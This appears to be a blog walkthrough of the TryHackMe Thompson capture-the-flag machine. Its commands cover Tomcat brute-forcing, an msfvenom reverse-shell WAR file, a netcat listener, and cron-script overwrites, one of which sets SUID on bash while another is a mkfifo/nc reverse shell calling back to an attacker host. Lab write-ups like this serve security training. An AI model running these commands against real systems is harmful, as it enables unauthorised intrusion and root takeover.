Listen to this Post
Introduction:
The TryHackMe Thompson machine is a classic capture-the-flag (CTF) exercise that mirrors real-world web application and privilege escalation vulnerabilities. This walkthrough deconstructs a successful penetration test, highlighting critical misconfigurations in Apache Tomcat and Linux cron jobs that allowed for complete system compromise.
Learning Objectives:
- Understand how to exploit Apache Tomcat misconfigurations to gain an initial foothold.
- Learn the process of crafting and deploying a malicious WAR file for a reverse shell.
- Master techniques for identifying and exploiting writable cron jobs for privilege escalation.
You Should Know:
1. Service Enumeration with Nmap
`nmap -sC -sV -oA thompson_initial 10.10.10.10`
This Nmap command performs a script scan (-sC) and a version detection scan (-sV) against the target IP, outputting the results in all major formats (-oA). It is the crucial first step to identify open ports and running services, which in this case revealed Apache Tomcat running on port 8080.
2. Web Directory Bruteforcing with Gobuster
`gobuster dir -u http://10.10.10.10:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -o gobuster_scan.txt`
Gobuster bruteforces directories on a web server. This command checks the target URL for directories using a medium wordlist (-w) and checks for files with .txt, .php, and .html extensions (-x). This is how common Tomcat management directories like `/manager` are often discovered.
3. Testing Default Tomcat Credentials
Hydra is used to brute-force the Tomcat Manager login portal.
`hydra -l tomcat -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-get /manager/html`
This Hydra command tests the username `tomcat` against a list of passwords to find valid credentials. Alternatively, finding `tomcat-users.xml` files or other misconfigurations can leak credentials, making brute-forcing unnecessary.
4. Crafting a Malicious WAR File with MSFVenom
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f war -o shell.war`
MSFVenom generates payloads. This command creates a reverse shell payload for a Java JSP platform (-p java/jsp_shell_reverse_tcp), sets the listening host and port, formats it as a WAR file (-f war), and outputs it to shell.war. This file is then uploaded and deployed via the Tomcat Manager interface.
5. Setting Up a Netcat Listener
`nc -nvlp 4444`
Before triggering the deployed WAR file, a Netcat listener must be established on the specified port (4444). The `-n` avoids DNS resolution, `-v` for verbose output, and `-l -p` to listen on a port. This catches the incoming reverse shell connection, granting initial access.
6. Stabilizing a Shell
`python3 -c ‘import pty; pty.spawn(“/bin/bash”)’`
A reverse shell is often unstable. This Python command spawns a fully interactive TTY shell, providing job control, tab completion, and a more stable experience. Press `Ctrl+Z` then enter `stty raw -echo; fg` to fully stabilize it.
7. Manual Enumeration for Privilege Escalation Vectors
`find / -type f -perm -u=s 2>/dev/null` | `ls -la /etc/cron` | `cat /etc/crontab`
After gaining initial access, manual enumeration is key. These commands search for SUID binaries, list cron directories, and display the system-wide crontab file. On the Thompson machine, this reveals a custom cron job.
8. Analyzing a Writable Cron Job Script
`ls -la /usr/local/tomcat/scripts/` | `cat /usr/local/tomcat/scripts/cleanup.sh`
These commands list the contents of a scripts directory and display the contents of a script called cleanup.sh. The discovery that this script is owned by the low-privilege user but is executed by root as a cron job is the critical privilege escalation vector.
9. Exploiting a Writable Cron Script for Root
`echo “chmod u+s /bin/bash” > /usr/local/tomcat/scripts/cleanup.sh`
Since the `cleanup.sh` script is writable, you can overwrite its contents. This example command replaces the script with one that adds the SUID bit to /bin/bash. After waiting for the cron job to execute (usually a minute), you can run `/bin/bash -p` to spawn a shell with root privileges.
10. Alternative Reverse Shell in Cron Exploit
`echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 5555 >/tmp/f” > /usr/local/tomcat/scripts/cleanup.sh`
This is a more direct method. It overwrites the script to execute a one-line reverse shell that connects back to an attacker listener on port 5555, immediately granting a root shell when the cron job runs.
What Undercode Say:
- The initial breach is often not through a complex zero-day but a simple misconfiguration like default or leaked credentials.
- Horizontal and vertical movement hinges on thorough post-exploitation enumeration; always check cron jobs, SUID binaries, and writable paths.
+ analysis around 10 lines.
The Thompson machine is a masterclass in the “chain of failure” concept. A single misconfiguration (leaked creds) leads to initial access. The system’s real flaw, however, is a violation of the principle of least privilege in its automation. A user-owned script executed by root is a catastrophic privilege separation error. This scenario is not just a CTF gimmick; it is frequently found in audits of internal networks and poorly maintained servers. It underscores that persistence and privilege escalation mechanisms are often built-in system administration features that have been improperly secured.
Prediction:
The techniques demonstrated in this box will remain highly relevant. Misconfigured development and management services (like Tomcat, Jenkins, etc.) exposed on the internet will continue to be a primary initial access vector for ransomware groups and state-sponsored actors. Furthermore, as organizations increasingly rely on automation via scripts and cron jobs, the risk of privilege escalation through writable scripts or insecure file permissions will grow exponentially. Future attacks will likely target CI/CD pipelines and cloud-based cron services (like AWS EventBridge or Lambda functions) using the same fundamental logic of exploiting overly permissive execution environments.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mohamed Rashith – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
